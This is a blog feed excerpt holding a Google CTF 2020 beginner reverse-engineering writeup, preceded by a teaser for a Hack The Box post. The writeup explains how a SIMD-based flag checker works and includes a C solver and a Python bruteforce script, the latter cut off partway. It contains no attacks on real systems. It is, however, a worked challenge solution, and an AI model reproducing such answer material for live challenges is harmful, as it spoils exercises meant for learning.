&lt;p&gt;Hey. It’s been a while. Here’s a post. Trying to mix things up a bit with a ctf writeup. It’s heavy on screenshots and if you notice any anachronisms it’s because the screenshots are from the future. Just kidding. I went back and forth to get more for illustration.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/Gofer.png&quot; /&gt;&lt;/p&gt;

</description>
        
        <pubDate>Tue, 01 Aug 2023 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/HTB-Gofer/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/HTB-Gofer/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>Google CTF 2020 beginner</title>
        <description>&lt;p&gt;&lt;em&gt;A short writeup for one of the first challenges for Google CTF 2020&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;the-challenge&quot;&gt;The Challenge&lt;/h3&gt;
&lt;p&gt;The binary is essentially a &lt;em&gt;“flag checker:”&lt;/em&gt; it checks if the input is the value of the flag.&lt;/p&gt;

&lt;h3 id=&quot;how-does-it-do-that&quot;&gt;How does it do that?&lt;/h3&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-graph1.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;First Check&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It accepts input via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;scanf&lt;/code&gt;, the size being 15 characters. It then uses &lt;strong&gt;SIMD instructions&lt;/strong&gt; to check if the flag is valid.&lt;/p&gt;

&lt;h3 id=&quot;the-what&quot;&gt;The what?&lt;/h3&gt;
&lt;p&gt;Same here. Have a &lt;a href=&quot;https://en.wikipedia.org/wiki/SIMD&quot; target=&quot;_blank&quot;&gt;wiki&lt;/a&gt;.
All of that isn’t really important, save for the instructions used:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pshufb&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;paddd&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pxor&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-graph2.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;Second Check&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;There are two checks:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;If the input is the same after it has been processed with the SIMD instructions, and&lt;/li&gt;
  &lt;li&gt;If the input starts with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CTF{&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-disas1.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The input is shuffled, added to a constant, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xor&lt;/code&gt;ed with a key and finally compared to the original input. The shuffle order, the added constant and the key are stored as data objects:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-hexdump1.png&quot; /&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.XOR = 0xaaf986eb34f823d4385f1a8d49b45876&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.ADD32 = 0x6763746613371337fee1deaddeadbeef&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.SHUFFLE = 0x000d0c0a08040f030e090b0501070602 or [0,13,12,10,8,4,15,3,14,9,11,5,1,7,6,2]&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The shuffle order is determined by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.SHUFFLE&lt;/code&gt; (with the list above, e.g. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;1234567890abcde -&amp;gt; 1dca954e0b62873&lt;/code&gt;), followed by adding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.ADD32&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xor&lt;/code&gt;ing with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.XOR&lt;/code&gt;. One caveat: that list reads the constant most-significant byte first, whereas &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pshufb&lt;/code&gt; consumes its mask in memory order, least-significant byte first, so the order the CPU actually applies is the list reversed; the same byte-order point applies to the other two constants. Also, SIMD instructions do not behave like the scalar x86 instructions, particularly &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;paddd&lt;/code&gt;. An &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;add&lt;/code&gt; instruction operates like &lt;a href=&quot;https://www.felixcloutier.com/x86/add&quot; target=&quot;_blank&quot;&gt;this&lt;/a&gt;:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DEST ← DEST + SRC;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;But &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;paddd&lt;/code&gt; on a 128-bit register operates like &lt;a href=&quot;https://www.felixcloutier.com/x86/paddb:paddw:paddd:paddq&quot;&gt;this&lt;/a&gt;, once per 32-bit lane:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DEST[31:0] ← DEST[31:0] + SRC[31:0];
DEST[63:32] ← DEST[63:32] + SRC[63:32];
DEST[95:64] ← DEST[95:64] + SRC[95:64];
DEST[127:96] ← DEST[127:96] + SRC[127:96];&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The former adds the two operands as single numbers and stores the sum in the destination register. The latter splits both operands into “double words” (32-bit lanes) and adds lane by lane. If a lane’s sum does not fit in 32 bits, the carry is simply discarded: each lane holds its sum modulo 2^32 and nothing carries into the neighbouring lane. Modelling this wrap-around exactly is crucial in finding the value of the flag.&lt;/p&gt;

&lt;h3 id=&quot;but-wait&quot;&gt;But wait&lt;/h3&gt;
&lt;p&gt;How is the flag found? How to get what is supposed to be looked for? Fortunately, there are two pieces of information to find the flag:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;It starts with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CTF{&lt;/code&gt; and,&lt;/li&gt;
  &lt;li&gt;It is 15 characters long.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Surprisingly, these are enough to find the flag, together with a likely third piece of information (it must be composed of printable characters). The flag’s value is bruteforced over the values that pass the checks, and the checks are stringent enough to cut the candidates down quickly. The complex part of finding the flag is in the implementation of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;paddd&lt;/code&gt;:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-func1.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The function breaks up (shuffled) input and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.ADD32&lt;/code&gt; each into 4 segments:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-func2.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Each segment is added to the corresponding segment of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.ADD32&lt;/code&gt; and the sum is masked (ANDed) with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xffffffff&lt;/code&gt;, dropping any carry out of the 32-bit segment. Finally, the resulting segments are combined back into one.&lt;/p&gt;

&lt;p&gt;To bruteforce the flag, the result of the first check is checked for printable characters. If any are found, they replace the placeholders in the flag:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/2020-08-24-bf1.png&quot; /&gt;&lt;/p&gt;
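&lt;p&gt;As an added example (not the challenge’s or the author’s code), here is a scalar C model of the three instructions and a solver that recovers the input from the same facts: the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CTF{&lt;/code&gt; prefix, the 15-character length and the printable-character assumption. The constants are &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.SHUFFLE&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.ADD32&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;obj.XOR&lt;/code&gt; written out in memory order, since &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pshufb&lt;/code&gt; reads its mask bytes least-significant byte first. Instead of substituting printable output bytes until a fixed point, the solver propagates constraints lane by lane (byte k of a lane’s sum depends only on bytes 0..k of that lane, in both directions) and guesses a single byte when it gets stuck.&lt;/p&gt;
<![CDATA[
```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* obj.SHUFFLE, obj.ADD32 and obj.XOR in memory (little-endian) byte order:
 * byte 0 here is the least significant byte of the hex constants above. */
static const uint8_t SHUFFLE_MASK[16] = {0x02,0x06,0x07,0x01,0x05,0x0b,0x09,0x0e,
                                         0x03,0x0f,0x04,0x08,0x0a,0x0c,0x0d,0x00};
static const uint8_t ADD_CONST[16]    = {0xef,0xbe,0xad,0xde,0xad,0xde,0xe1,0xfe,
                                         0x37,0x13,0x37,0x13,0x66,0x74,0x63,0x67};
static const uint8_t XOR_KEY[16]      = {0x76,0x58,0xb4,0x49,0x8d,0x1a,0x5f,0x38,
                                         0xd4,0x23,0xf8,0x34,0xeb,0x86,0xf9,0xaa};
static uint32_t get_lane(const uint8_t *b, int l) {   /* 32-bit lane l, little-endian */
    b += 4 * l;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}
static void put_lane(uint8_t *b, int l, uint32_t v) {
    for (int k = 0; k < 4; k++) b[4 * l + k] = (uint8_t)(v >> (8 * k));
}

/* pshufb: out[i] = in[mask[i] & 15]; no mask byte here has the zeroing bit 7 set */
void pshufb(const uint8_t in[16], const uint8_t mask[16], uint8_t out[16]) {
    for (int i = 0; i < 16; i++) out[i] = in[mask[i] & 15];
}
/* paddd: four independent 32-bit additions; uint32_t wraps, so a lane's carry is dropped */
void paddd(uint8_t v[16], const uint8_t add[16]) {
    for (int l = 0; l < 4; l++) put_lane(v, l, get_lane(v, l) + get_lane(add, l));
}
void pxor(uint8_t v[16], const uint8_t key[16]) {
    for (int i = 0; i < 16; i++) v[i] ^= key[i];
}
/* Both checks on the 16-byte buffer (15 characters plus the terminating NUL). */
int check16(const uint8_t in[16]) {
    uint8_t t[16];
    pshufb(in, SHUFFLE_MASK, t);
    paddd(t, ADD_CONST);
    pxor(t, XOR_KEY);
    return memcmp(t, in, 16) == 0 && memcmp(in, "CTF{", 4) == 0;
}
int flag_check(const char *input) {              /* what scanf("%15s") would hand over */
    uint8_t in[16] = {0};
    size_t n = strlen(input);
    memcpy(in, input, n > 15 ? 15 : n);
    return check16(in);
}

/* Constraint propagation.  Within a lane, byte k of (s + ADD) ^ XOR depends only
 * on shuffled bytes 0..k, and byte k of (in ^ XOR) - ADD only on input bytes 0..k,
 * so known low bytes pin down further bytes in both directions.  0 = contradiction. */
static int propagate(uint8_t in[16], uint8_t known[16]) {
    for (int changed = 1; changed;) {
        changed = 0;
        for (int l = 0; l < 4; l++) {
            uint8_t s[16] = {0}, t[16] = {0};
            int ks = 0, kt = 0;                  /* known low bytes of s and of in */
            while (ks < 4 && known[SHUFFLE_MASK[4 * l + ks]]) { s[4 * l + ks] = in[SHUFFLE_MASK[4 * l + ks]]; ks++; }
            while (kt < 4 && known[4 * l + kt]) { t[4 * l + kt] = in[4 * l + kt]; kt++; }
            uint32_t fwd = (get_lane(s, l) + get_lane(ADD_CONST, l)) ^ get_lane(XOR_KEY, l);
            uint32_t rev = (get_lane(t, l) ^ get_lane(XOR_KEY, l)) - get_lane(ADD_CONST, l);
            for (int m = 0; m < 4; m++) {
                int i = 4 * l + m, j = SHUFFLE_MASK[i];  /* out[i] must equal in[i]; s[i] is in[j] */
                uint8_t f = (uint8_t)(fwd >> (8 * m)), r = (uint8_t)(rev >> (8 * m));
                if (m < ks && known[i] && in[i] != f) return 0;
                if (m < ks && !known[i]) { in[i] = f; known[i] = 1; changed = 1; }
                if (m < kt && known[j] && in[j] != r) return 0;
                if (m < kt && !known[j]) { in[j] = r; known[j] = 1; changed = 1; }
            }
        }
    }
    return 1;
}
/* Propagate; when stuck, guess the first unknown byte (printable) and backtrack. */
static int solve_rec(uint8_t in[16], uint8_t known[16]) {
    if (!propagate(in, known)) return 0;
    int u = 0;
    while (u < 16 && known[u]) u++;
    if (u == 16) return check16(in);
    for (int v = 0x20; v < 0x7f; v++) {
        uint8_t in2[16], known2[16];
        memcpy(in2, in, 16); memcpy(known2, known, 16);
        in2[u] = (uint8_t)v; known2[u] = 1;
        if (solve_rec(in2, known2)) { memcpy(in, in2, 16); return 1; }
    }
    return 0;
}
/* Recovers the flag from the "CTF{" prefix and the 15-character length (byte 15 is NUL). */
int solve_flag(char out[16]) {
    uint8_t in[16] = {0}, known[16] = {0};
    memcpy(in, "CTF{", 4);
    known[0] = known[1] = known[2] = known[3] = known[15] = 1;
    if (!solve_rec(in, known)) return 0;
    memcpy(out, in, 16);
    return 1;
}

int main(void) {
    char flag[16];
    if (solve_flag(flag)) printf("%s (passes check: %d)\n", flag, flag_check(flag));
    return 0;
}
```
]]>
&lt;p&gt;From the initial facts alone the propagation fills in four more bytes and then stalls, so exactly one byte has to be guessed; every wrong guess is contradicted within a few steps and the survivor is verified with the full check. The same lane-local reasoning is what makes the author’s substitution loop converge: each printable output byte it copies back is one of these derived bytes.&lt;/p&gt;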

&lt;h3 id=&quot;code&quot;&gt;Code&lt;/h3&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;&lt;span class=&quot;c1&quot;&gt;#!/usr/bin/env python3
&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;binascii&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;():&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;prefix&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;CTF{&quot;&lt;/span&gt;
	
	&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;x&quot;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;x&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;range&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;15&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)]&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;i&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;range&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;prefix&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&apos;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\x00&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;&lt;/span&gt;
	
	&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Array: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;shuffle&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;	
		&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Shuffled: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;add32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Sum: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;hex&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;xorCheck&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;binascii&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unhexlify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;hex&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;xor&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:])[::&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;XOR Check: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;xorCheck&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;tmp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;xorCheck&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;sa&quot;&gt;b&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\x00&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;tmp&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&apos;&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)).&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;():&lt;/span&gt;
			&lt;span class=&quot;k&quot;&gt;break&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
			&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;i&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;range&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;15&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
				&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;xorCheck&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;printable&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
					&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;xorCheck&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt;
			&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;New: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
		
	&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Found: &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)))&lt;/span&gt;	

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;shuffle&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;order&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;13&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;12&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;15&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;14&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;11&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;7&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt;	&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;order&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;flag&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
